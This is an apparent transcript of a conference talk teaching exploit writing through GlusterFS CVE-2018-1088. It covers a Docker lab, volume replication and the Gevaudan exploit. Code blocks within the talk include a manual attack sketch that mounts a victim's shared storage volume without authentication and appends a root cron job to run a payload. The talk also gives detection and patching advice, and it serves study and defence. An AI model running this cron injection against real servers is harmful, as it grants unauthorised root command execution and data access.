So thank you for our second talk of the day. This is Maro. He's going to be talking about owning GlusterFS. Make sure you ask him about the exploit he has. Hey, how are you? Well, this is a really beginner-friendly talk. It's about exploiting Gluster, CVE-2018-1088: unauthenticated access to a shared storage volume. This is a talk I wrote with newcomers in mind, for those who are new to both worlds: exploit writing and data replication. The entry point for many people into the world of data replication is Gluster, and I also found that it was really easy to write an exploit for this CVE, so I wanted to share it with everyone who's interested in writing exploits in the future. I want to ask for your pardon in advance: my pronunciation might not be the best, so if something isn't understood, just raise your hand and I'll try to repeat it. So let's start. A brief introduction of who I am and what I'm doing. I'm from Argentina, I was born in the 90s, I work at Almalac, a government office, and I own a really small company related to infosec in Argentina. And well, let's get going. For this talk I wanted to build a lab with virtual machines, but I decided on Docker because of a recommendation from a friend. Does anybody here use Docker? Fine. For the rest who don't: it's really easygoing, really easy to understand. This talk is mainly a hands-on lab. I understand many of you won't want to connect to the Wi-Fi network, many of you won't feel comfortable downloading an exploit from a repo, and most of you won't feel comfortable using Docker here in this environment. So it's fine if you don't want to follow along; you can download it later. I'll try to follow the lab here like a live demo. So, okay. A quick start on Gluster for everybody who doesn't use it. Gluster is a scalable network file system.
You can use any cheap hardware you have to run it. As I said before, it's a really good starting point for those interested in data replication. You can replicate almost any data on almost any hardware, I mean. We have succeeded using it on really, really humble hardware, Raspberry Pis and the like, old laptops and so on, and we have even used some USB drives to clone, and it worked like a charm. It was acquired by Red Hat in 2011, but it's also available in the free world as an open source project. As I was saying before, anything can run Gluster. It's really hard to find something that doesn't work with it: FreeBSD, NetBSD, OpenBSD, whatever, even Raspbian. Anything you want can run it. In this talk, we'll set up Gluster as a simple replication service. We won't enter into the hassle of configuring complex things; the bug itself, the vulnerability, is really, really silly in fact. So we will build a simple lab, nothing complex. Our minimalistic setup will have two Gluster nodes, a volume for each node, a single brick for each volume, and a bunch of test files. What does a node mean? Any server or computer that holds one or more bricks. The bricks are the basic unit of storage in Gluster, and a volume is a logical collection of those. Every file resides inside bricks. You can think of them like a sort of directories; I know it's not the exact definition, but it gives a simple idea of this. Bricks compose volumes. All operations will occur at node level and will propagate accordingly. This illustrates basically everything I said before: you have the mount point on your operating system, the replicated volume, and the files on the bricks. A quick start on Docker for those who haven't used it before. Docker is the company driving the container movement.
A container platform provides all the pieces an enterprise operation requires, including security, governance, automation, support, and certification. This is the definition provided by Docker itself. Let's suppose we have virtual machines. You can have an app separated into a VM for the app, a VM for the database, and, if you want, a VM for the file systems. Containers are different. As they are oriented towards microservices, the target is to have a minimal functional unit. On a container-based infrastructure, the same app as before may look like this: a backend container with just your custom binaries, your custom libraries, and your app, nothing else. The web server: you might have a container for Apache, for NGINX, for whatever you want. And the DB container might have just a DB engine; it might not even hold the database itself, the data files. Here we have a comparison. As you might see, you're just putting your custom things, your custom application, your custom binaries, your custom libraries, in your container. Everything else underneath is shared across all the containers. Okay, a common question is: where are my configuration files? We won't use them in this case, but I think that always troubled me when I was learning Docker. If you follow the best practices, you will store them in an external volume, and you can even share all your config files across all your containers. So you can have better control of your configuration files. Say, okay, this instance is configured that way; okay, every instance will follow that policy, if we want to call it like that. Okay, the OS: Docker uses runC. You might remember LXC; containers run in the same operating system. They also feature layered file systems.
Okay, the binaries: even if you're using custom ones, the classic Unix userland is shared and available along all the containers. Okay, we'll build our hands-on lab. Once again, I know you may not be comfortable doing this live right now, so, okay, no problem: I'll have a live demo here. The Docker containers you can easily install; I love doing apt install docker, git, and the GlusterFS client at that specific version. This obviously also works for yum- or DNF-based distros, no problem, even for FreeBSD. Okay, I have my repo, gevaudan, on github.com. You can simply build the image and tag it whatever you want; the tag is the name you're giving to the image itself, gevaudan/gluster. It should be run in a privileged environment because Gluster requires it. You can run most of the images or Dockerfiles out there without any privileged user. This will give us an instance ID that you can use to identify that container. The magic of Docker is that you can run as many instances as you like, or as you can, of the same product. So if we run this command, docker run --privileged, twice, we will have two instances of the lab. If we run it three times, we have three instances, and so on. This is really useful when you need to configure something on top, like failover or load distribution. Using the command docker ps, you can see the lab: they're both running, with different IDs obviously, and what they are doing. I would like to share with you the Dockerfile so you can see how easily it is built. This is our Dockerfile. As you might see, this is the base: debian:stretch-slim, so we are pulling an already-made image. We just run the update, then install, without prompting, the GlusterFS server at the vulnerable version, 3.8.8-1, and purge everything that we don't need.
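Putting the build steps just described together, the lab Dockerfile looks roughly like this; a hedged sketch, since the exact brick path and entrypoint are assumptions, and only debian:stretch-slim and the glusterfs-server 3.8.8-1 pinning come from the talk:

```dockerfile
# Sketch of the lab Dockerfile described above.
FROM debian:stretch-slim

# Install the vulnerable GlusterFS server without prompting, then purge
# what we don't need to keep the image minimal.
RUN apt-get update && \
    DEBIAN_FRONTEND=noninteractive apt-get install -y glusterfs-server=3.8.8-1 && \
    apt-get clean && rm -rf /var/lib/apt/lists/*

# Custom configuration: brick directory with open permissions for this
# test (directory name is hypothetical).
RUN mkdir -p /gluster/brick && chmod 777 /gluster/brick

# Run the Gluster daemon in the foreground as the container's process.
CMD ["glusterd", "-N"]
```

Built and run, this is what the `docker build -t gevaudan/gluster .` and `docker run --privileged` steps in the demo operate on.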
Docker points towards microservices, so we need to have a minimal setup in every container. And these are the custom configurations: to make the Gluster volume directory, to give it open access for this test, to run Gluster, and to change the PS1 just to look like the one shown here. Sorry, the PS1 thing is something aesthetic, just to have it that way here. Okay. As you might see, we have both containers running. We can enter the containers just doing that command, docker exec -ti (it's for executing in an interactive way) bash. So we have the IP address of every container. How do we set up Gluster for this? As we have two containers, we'll call them serverA and serverB. We can enter serverA and issue the following commands. gluster peer probe serverB: this is for making serverA recognize the other one, check that it is running a Gluster instance, and pair with it. Then gluster peer status, and on the other side too, gluster peer status. We get something like this, as you might see. Probe: yeah, it's working. Status: yeah, I have a peer, this is my new peer. From the other side we don't have to pair it again. Status: number of peers, one, and a unique ID. So they are recognized as peers. Remember, these are vulnerable versions; the packages are already patched upstream, so don't keep these containers for anything more than testing. Okay, let's keep going. We have to create volumes for this: gluster volume create defconvol replica 2 transport tcp, with the bricks of serverA and serverB on this mount point. Remember, in the Dockerfile we stated to create this mount point; Gluster won't create it if it doesn't exist. Then on serverA again, gluster volume start defconvol, so start this volume. And gluster volume info from the other side, just to check that it found it. You might see these are the outputs from the commands: success, the volume started, and there it is.
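The peering and volume-creation steps just walked through are, as a sequence; a hedged sketch, since the volume name (defconvol) and brick path are reconstructions of what was said, not confirmed spellings:

```shell
# Run on serverA: peer with serverB, then build a 2-way replicated volume.
gluster peer probe serverB
gluster peer status                # should report: Number of Peers: 1

# Volume name and brick paths are illustrative reconstructions.
gluster volume create defconvol replica 2 transport tcp \
    serverA:/gluster/brick serverB:/gluster/brick
gluster volume start defconvol

# On serverB, verify the volume is visible without any extra pairing:
gluster volume info defconvol
```

These commands require a running Gluster daemon on both nodes, which is exactly what the two lab containers provide.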
And this one, without further interaction, knows where it is located and starts to replicate here. This lab is already set up for replicating. So, on a client, a desktop, a laptop, whatever we are using outside Docker, we make our mount point, gevaudan-poc. Then we do mount -t glusterfs, via serverA, defconvol. As you might see, we skip any path, just defconvol, and mount it here, where we just made the mount point, gevaudan-poc. This will, sorry, this will mount the originally created volume. Then on our desktop: echo "data duplication village" into the mounted banner file. This will make the replication happen. So we'll cat the file on both nodes and check that it has replicated, in fact. As you might see, here we create the file; cat, it worked; cat, it worked; no further interaction. It's really easy for people who are newcomers to this world. I am, in fact, a newcomer to this world, so I found it really easy to get myself involved with Gluster. Now, if everything went the right way, our lab is replicating, but it's not vulnerable yet. So, let's destroy it. This, for everybody who's not into the container movement, is the logic behind Docker, or behind any microservice: you run it, it fails, okay, we respawn it, and we keep running. The main point in Gluster is to be recycled, to be constantly reissued, to say it in a certain way. Okay, let's use Gevaudan on Gluster. First, I want you to understand what the CVE is about. This is a new CVE; this is from May, and I wrote this talk in June. It was patched just some, maybe, I think, two or three days after it was issued. It was a really silly bug. Gevaudan: GlusterFS vulnerable authentication for data access and nuke. It's an exploit for GlusterFS CVE-2018-1088 and CVE-2018-1112, written in Ruby. Basically, this vulnerability allows any Gluster client to connect without any authentication to a shared storage volume.
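The client-side mount and replication check just described can be sketched as follows; hedged, since the mount point and file names are reconstructions of the garbled audio:

```shell
# On a client machine outside Docker (mount point name follows the demo):
mkdir -p /mnt/gevaudan-poc
mount -t glusterfs serverA:/defconvol /mnt/gevaudan-poc

# Write a file through the mount; Gluster replicates it to both bricks.
echo "data duplication village" > /mnt/gevaudan-poc/banner.txt

# On serverA and serverB, cat the file from the brick directory to
# confirm replication happened with no further interaction:
cat /gluster/brick/banner.txt
```

Note that the mount target names only the volume, `defconvol`, never a brick path; the client learns the brick layout from the server it connects to.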
In that shared storage volume, which Gluster manages, resides the task scheduler's file. And by modifying that specific file from the scheduler, a cron file (I think we all know how cron works; okay, it's a cron file), you can schedule arbitrary commands and tasks, whatever you like. This allows many actions, from privilege escalation to total data compromise or nuke. As you might see, this is using the tool debsecan. It tells you what vulnerable packages you have and what vulnerabilities reside in your system. As you might see, these are the only ones we have: Gluster, the client, the server, and the common package. In order to exploit this, the shared storage feature must be enabled. It is not enabled by default now; it was in the first versions, so it was vulnerable historically. So you should explicitly run on your server: gluster volume set all cluster.enable-shared-storage enable. We check it took effect with gluster volume get on the cluster.enable-shared-storage option. And then the snapshot scheduler should be enabled; it is a Python script, snap_scheduler.py init. This might seem like a complex configuration, but in fact many enterprise sites are already using it. It might seem complex for someone like me who doesn't use Gluster for anything bigger than a simple proof of concept at a lab, but every environment from medium size and up uses this feature. So, success. Here we see the option enabled; we start the scheduler and it says, okay, the snap scheduler is running. But it doesn't only cron snapshots. You can cron whatever you want. In fact, if you use any interface, or even the command line, you can pass any arbitrary task; it doesn't have to be a snapshot. This feature to this day works like this: you can pass whatever you want. So, what happens with a shared storage volume? It's intended to be shared.
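The precondition setup just described amounts to a few commands on the server; a hedged sketch, since the exact option and script names below follow the upstream Gluster tooling rather than a confirmed transcript:

```shell
# Enable the shared storage feature (off by default in current versions):
gluster volume set all cluster.enable-shared-storage enable

# Confirm the option took effect:
gluster volume get all cluster.enable-shared-storage

# Initialize and enable the snapshot scheduler, the Python helper script
# that creates the cron file involved in the vulnerability:
snap_scheduler.py init
snap_scheduler.py enable
```

Once `cluster.enable-shared-storage` is on, Gluster itself creates and mounts a volume named `gluster_shared_storage` across the trusted pool, which is exactly the volume the exploit targets.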
The architecture of Gluster allows all clients to mount any volume, including the shared storage volume involved in this vulnerability. If at any point the Gluster snapshot scheduler is enabled, by running that Python script, it will create a symlink in /etc/cron.d, obviously owned by root. So anyone who can mount this volume can schedule cron jobs, again, passing whatever they want. This is the Red Hat advisory, untouched; it's like they polished it. As you might see, doing an ls -l, we see that it's a symlink into /var/run/gluster, to the glusterfs_snap_cron_tasks file. So, as I can interact with it, I could also attack it using vi, nano, vim, whatever you like, or ee if you come from BSD. By issuing the given commands, your lab is now vulnerable to Gevaudan. Okay, we'll use the exploit. The exploit is in fact something really simple. I wrote it commented line by line, so for any newcomer to the exploit writing world (I'm no expert at all), if someone wants to start from some point, it's commented line by line so everybody understands what every line is doing at any time. You can easily, as I said before, try to hack on this using your preferred text editor. But, well, here we have the exploit. It comes as a standalone exploit, my preferred method, or as a Metasploit module. In most cases the standalone will be enough, and it takes just a few seconds to exploit this. This is the Metasploit version; as you might see, it's further customizable than the standalone one. In order to use Gevaudan standalone, you can simply run gem install colorize (colorize is a gem for having colored output; you can leave it out if you want) and just run sudo gevaudan.rb with the server you want to exploit, in my case this one. It won't take more than five seconds, and it will schedule a new task, an evil shell. You know, it's like a shell, but evil, and it's fictional. And then we can check the contents of the tampered cron file. As you might see, it croned something to run.
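Conceptually, what the exploit automates boils down to a handful of commands; a hedged sketch of the manual attack, where the mount point and payload path are made-up illustrations, and the in-volume file path follows the advisory described above:

```shell
# On the attacker's machine: mount the victim's shared storage volume.
# On vulnerable versions, no authentication is required.
mkdir -p /mnt/evil
mount -t glusterfs victim:/gluster_shared_storage /mnt/evil

# The snapshot scheduler's task file lives inside this volume, and the
# victim's /etc/cron.d symlinks to it, so anything appended here is run
# by the victim's crond as root (payload path is hypothetical):
echo '* * * * * root /bin/sh /tmp/payload.sh' >> \
    /mnt/evil/snaps/glusterfs_snap_cron_tasks
```

The standalone Ruby exploit and the Metasploit module both perform this same mount-and-append sequence, just with discovery and cleanup wrapped around it.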
This output has a failure in the line breaking, but it's well croned. Okay. Now it's time to attack the Docker containers, and the result should be similar to this. This should be the output of Gevaudan. Okay: I am the superuser; Gluster binary located; the server replies to ICMP requests (a simple request, nothing really forged or uncommon); Gluster ports are open; we're attempting to exploit; we have successfully exploited the Gluster shared storage; we mounted it here. On the client side this is automatic, so you don't have to set up anything unless you're using the Metasploit module. Okay, now we have access. This is everything we have in the volume. If you have any other compromising file, important file, whatever you have, it will be displayed here and will be fetched. The cron file was altered, and we injected an evil job, or whatever you want to run. Okay. You can load the exploit at any time, check it line by line, and see how it works; the Metasploit module too. It's not pushed into the official Metasploit repo. Okay, we'll take our time to explain this if anyone has any question. It's really simple, really easygoing, so it doesn't have any complexity beyond running as the superuser. There's a little check we made, Castle, another standalone Ruby script. Why did I take the time to build this, which seems really overkill? We have really, really big farms of servers running this vulnerable version at many clients. In fact, it was my first time testing Gluster at all. A customer told me, hey, Red Hat issued some advisory about Gluster. Okay. We used this with Ansible. You know Ansible? Like Chef or Puppet for poor men like me. It worked; it was okay: vulnerable, vulnerable option, or the snap cron tasks file is a symlink and can be exploited. So we have some report to show the customer. It's also in the repo, and you can also find the Dockerfile to build the image and some of these snapshots. Okay. How do I patch this?
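The fleet check the speaker ran through Ansible essentially boils down to testing whether the snap cron tasks file is present as a root-owned symlink; a minimal sketch of that test as a portable shell function (the path is the one the advisory describes, and the function name is made up):

```shell
#!/bin/sh
# Report whether a snap-scheduler cron file is a symlink, which is the
# exploitable precondition described in the talk.
check_snap_cron() {
    if [ -L "$1" ]; then
        echo "VULNERABLE: $1 is a symlink"
    else
        echo "OK: $1 not present or not a symlink"
    fi
}

check_snap_cron /etc/cron.d/glusterfs_snap_cron_tasks
```

Run per host (by Ansible, Chef, Puppet, or plain ssh), this yields the same vulnerable/not-vulnerable report the speaker showed the customer.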
Like most vulnerabilities out there, the vendor issued its own patch. A simple update, upgrade, whatever you like. It's available across all platforms; remember, Gluster is available from Windows to Linux to even BSD, so everybody has its patch already available. Okay, my conclusions, and then questions. Gluster is not vulnerable per se; it's not something like Adobe Flash Player. In fact, in a span of five years it had less than 10 vulnerabilities; in fact, it had six. The last two are from after Red Hat bought them; they were introduced before the acquisition, but Red Hat found them. And simple bugs like this can bring chaos. So if you now feel like forking this, modifying it, translating it, writing something else, be my guest. It's free to use. And it's a nice starting point for teaching someone to write an exploit step by step without having to learn assembler, C, or memory positioning, something that could be hard for newcomers and could scare them off. Okay. Special thanks to the Data Duplication Village crew and to my working team. Anybody has any questions? Okay. Thank you.